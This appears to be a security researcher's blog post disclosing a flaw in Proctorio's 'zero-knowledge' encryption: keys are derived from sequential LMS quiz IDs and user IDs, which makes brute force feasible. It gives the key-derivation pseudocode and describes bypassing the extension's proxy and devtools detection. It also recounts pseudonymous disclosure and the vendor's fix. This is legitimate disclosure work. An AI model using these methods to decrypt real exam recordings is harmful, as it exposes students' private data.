Wave Rake: Proctorio

A zero-knowledge encryption flaw, enabling trivial brute forces of student data when Canvas/Moodle is used.

This is my timeline on a flaw I discovered and reported in Proctorio's 'zero-knowledge' end-to-end encryption, and includes my thoughts on it. All statements are my opinions. No original source code is included, any examples use pseudocode that conveys purpose.

The Flaw: TL;DR

The encryption keys used to store all data recorded during a course of an exam is derived from the exam or quiz's “content ID” on the LMS. Canvas and Moodle use incrementing integers for their IDs, making a brute force trivial. I would estimate that any attacker that has already obtained encrypted data can brute force the encryption at a rate of a few hours per recording on a commodity laptop – which could easily be accelerated with specialized tools, or with more computer power.

I called it 'Wave Rake' as a homage to the lockpicking tool which allows locksmiths to quickly 'brute-force' their way into budget locks. Note that the writeup that follows is high on technical detail and probably low on readability.

What the flaw is not

The flaw does not enable any random person to go connect to Proctorio's servers, receive the data, and walk away with it. The threat model in this case includes a rogue employee at Proctorio who has datacenter access and wants to decrypt information, or a post-compromise event where a malicious actor has obtained encrypted information and needs to decrypt it.

Prologue

I started my research into Proctorio when I first heard we were using it for quizzes and exams at Miami University. I skimmed through public-facing documentation, and the one thing that stood out to me was the claim of 'zero-knowledge encryption', noting that they used AES-256 for it. AES is a symmetric cipher, so I immediately had doubts about how an AES key could be shared between professor and student without Proctorio ever handling the key material.

In addition, background research about the company brought up the usual suspects of Olsen's actions against students: posting student support logs in a Reddit squabble, and suing Ian Linkletter, a learning technology specialist at UBC, for tweeting links to support material, or for sending an, in my opinion frivolous and almost entirely false retraction request for Shea Swauger's peer-reviewed academic paper, after which “The Proctorio Team” called it an opinion piece.

In addition to those two, there was also the DMCA back and forth between Proctorio and Erik – Erik initially looked into the language translation files shipped with Proctorio and found strings which indicated that Proctorio had access to room scans and IDs, among other things. Proctorio subsequently used the DMCA to take down those tweets, which were what EFF attorneys called 'a textbook example of fair use'.

After seeing what Erik found and how Proctorio reacted to Erik, I began to start searching through their extension, to try and verify their 'zero knowledge' encryption claims.

Obfuscation

During the course of my reverse engineering, I found out that Proctorio uses JScrambler – I found annotations referring to JScrambler in the code – specifically, comments about skipping some of JScrambler's obfuscation passes in the code. Those comments were removed in the latest version, though Proctorio still uses JScrambler – you can tell this is the case, as they make use of Variable Masking and Regex Obfuscation, both JScrambler features, in their code.

This is noteworthy, because obfuscation of any form is against the Chrome Store Developer Program Policies:

Code Readability Requirements: Developers must not obfuscate code or conceal functionality of their extension. This also applies to any external code or resource fetched by the extension package.

There's another form of “obfuscation” – function renaming. Proctorio took several common CryptoJS functions used throughout their code and renamed them after intelligence agencies – for an example (this may not reflect code), md5 may become kgb, and aes might become cia.

This obfuscation of code and concealment of functionality is probably in violation of Chrome's policies, and probably in breach of Proctorio's agreement with Google to distribute the extension – I have attempted to contact Google regarding this, but have not heard back.

Nonetheless, I am working on tools to defeat variable masking and other similar obfuscation trickery – watch my blog for updates.

Code Tracing

Once you learn you're working with a (partially) obfuscated codebase, one of the simplest ways to start out is to look for calls to libraries – in Proctorio's case, looking for calls to CryptoJS/SJCL for encryption/decryption.

Sometimes, this can send you down a rabbit hole – Proctorio's encryption calls happen in an 'event handler', as one of the hundreds of possible events, and access stuff from what appeared to be a part of the extension's global state.

I started by looking at where the key came from – and then start to trace all variables that were associated with the key generation. It used PBKDF2 to generate keys; the salt came from the result of a web request (we'll get back to this later), and the password came from some other global state.

The next step was to trace all writes to the global state – I did this manually, by renaming variables and then looking at all accesses to them. The important call that modified the part of the quiz state I was looking for is what I call QuizLoader for lack of a real name (minification removes names from source).

Each LMS has an associated QuizLoader, which sets up some global state for Proctorio. The QuizLoaders for Canvas and Moodle parse the URL for a 'Quiz ID' on Canvas or a 'Content Module ID' on Moodle – which is where the first half of the key comes from.

Web Tracing

The second half of the key was returned from a web request made to Proctorio's servers – which meant I needed to perform some form of dynamic analysis – either send duplicate web requests (and mimic their cookie handlers that they registered with Chrome), inject code into their extension (to log the request to LocalStorage, which I could open and parse outside Chrome, or to look for .requestAnimationFrame() and the devtools page to bypass developer tools detection), or to man-in-the-middle traffic with a proxy.

Proctorio attempts to detect most proxies – they do so by trying to read and clear the proxy settings stored in the browser. To get around this, one approach is to use a network-layer proxy. mitmproxy can be used as a network-layer proxy using a few iptables tricks on Linux – this is what I ended up using to listen in on the OAuth request made by Proctorio.

The response payloads are encrypted using a fixed AES key derived elsewhere from the version and extension ID, so the response isn't immediately visible, but it can still be decrypted. The jury is out on whether this too can be considered 'concealment of functionality' per the Chrome Developer Policies.

Once I had the response data decrypted, I was actually taken aback. They used the Canvas user ID for their encryption. (And bonus; the user ID is also a part of the /quiz/start payload – so they have that half of the key, and likely store it next to encrypted data.)

Show me the bug!

Now that you've got so far, here is what the key generation essentially looks like:

key = PBKDF2(password=MD5(quizID), salt=MD5(userID), count=12048)

Correction: an earlier version of this article had quiz and user IDs swapped in the above line. Every other facet remains unchanged.

On Canvas and Moodle, quiz ID is a simple increasing number, so with a count of 12,048, brute forcing it would only take a few hours at most on a commodity laptop.

Pseudonymous disclosure

With what Proctorio was doing to my classmate and friend Erik Johnson, I did not feel like taking the risk of using a real identity to report the flaw. Instead, I concocted an “Alison Skye”; got them an account on ProtonMail, and eventually set up a Ubuntu VM with all traffic proxied over Tor to use Keybase to report the flaw.

OpSec was paramount – I strived to keep everything away from people who might say too much for my own safety. I also had a temporary stint where I migrated everything to Qubes OS, before moving back to a more normal environment for battery life concerns.

Recommendations for future security researchers: it might make more sense to use Tutanota instead of ProtonMail – they allow registrations over Tor without requiring any existing email, or any payment verification at the time of writing. Also, make sure you don't share initials with your pseudonym. (oops!)

Fixes

Proctorio hardened this key derivation to some extent about a week and a half after I reported it – some extra constant noise was added and the amount of time needed was increased by changing the round count to 12,048,000, but the flaw still exists in a reduced form.

While a brute force from scratch may still take about a week and a half, the problem here is the scalability of the brute force – when you find the quiz ID for one stored record, you can simply reuse it for other records at the same university with similar start and end times. With anywhere between 20-150 students on average per test, in my experience, that enables you to make quick work of the encryption with a more specialized attack (say, hardware accelerated crypto/GCP pre-empted VMs) and just trying the same key on similar records.

In addition, Proctorio introduced what they call 'High Security Plus', while that really should have been the default, in my opinion. In this mode, universities generate full RSA asymmetric keypairs, with the private key stored securely by either school IT or professors and the public key stored by Proctorio and delivered to students. Data encrypted by the public key can only be decrypted by the private key, and a brute-force is non-trivial with current and future hardware.

The most pressing problem in this mode is key security – this shifts some of the onus from Proctorio to school IT teams; most professors strive to be the best they can be for their students, but from experiences I've heard across campuses, IT teams are less socially attached to the university.

Bonus: Open source

Here's a short list of open source libraries that I suspect are bundled with Proctorio that went without credit; just by Ctrl-F and looking for error messages – no 'reverse engineering' required!

The last one is pretty infamous, as they use mustache.js for all of their templating, include multiple copies of it, yet omit it from their Licenses list.

This is probably in violation of the MIT License used in these projects, though IANAL.

Bonus 2:

This one is golden enough that it speaks for itself:

[[email protected] assets]$ strings proctorio.pexe | grep "mike"
/Users/mike/naclports/src/out/build/opencv/opencv-2.4.9/modules/objdetect/src/cascadedetect.cpp
/Users/mike/naclports/src/out/build/opencv/opencv-2.4.9/modules/core/src/alloc.cpp
/Users/mike/naclports/src/out/build/opencv/opencv-2.4.9/modules/core/src/matop.cpp

Hello, Olsen's Mac! (please use a CI. OpSec.)

Hall of... infamy?

Here's just a quick reminder that there were a lot of people who have missed out that this was an issue;

On Responsible Disclosure

Some have asked me why I disclosed this to Proctorio in advance and waited for a fix. Others have asked why I did not disclose other things, like the missing credits for several open source projects in their code.

My answer to that is that the reason I've entered this field is to protect student privacy. A bad actor with knowledge to break encryption could be bad news for the millions of students forced to use Proctorio. However, confidential documents floating on the open web or improper code reuse without regard for licenses are Proctorio's problem to deal with, not mine.

Takeaways

In an interview with TechRound, Proctorio's CEO Mike Olsen claimed that students “just make things up”. Here's the full quote once again:

It’s hilarious, students pretending to care where their data goes. Whether they’re cheating or not, I don’t really care, but then they go out and they just say things. They don’t do any research, they just make things up.

As a first-year university student, I beg to differ. I host this blog myself using WriteFreely with only CloudFlare reverse proxying it to take load off my server – I do not track or sell any data, nor do I have any advertisements. Nor do I have to sign off any blog content to a third-party (with Hashnode, WordPress.com or similar).

There are a variety of good arguments against exam spyware, and there are people who do justice to various other issues, such as the DEI concerns, ableism, and so on, much better than I can.

Make no mistake, 'forgetting' to cite multiple sources in an academic environment would probably get you at least a warning on your transcript and at most an expulsion. Exam spyware companies manage to get away with it time and time again, though – and Proctorio wouldn't be the only one by a long shot.

And be it from Proctortrack or Proctorio (or several other vendors on my radar), security is often lacking, though by differing extents. For some perspective, Proctorio's encryption fail would be like getting a D- on a test nobody else even showed up for.

Reach me on @Oxylibrium on Twitter, or on [firstname].[lastname]@protonmail.com for inquiries.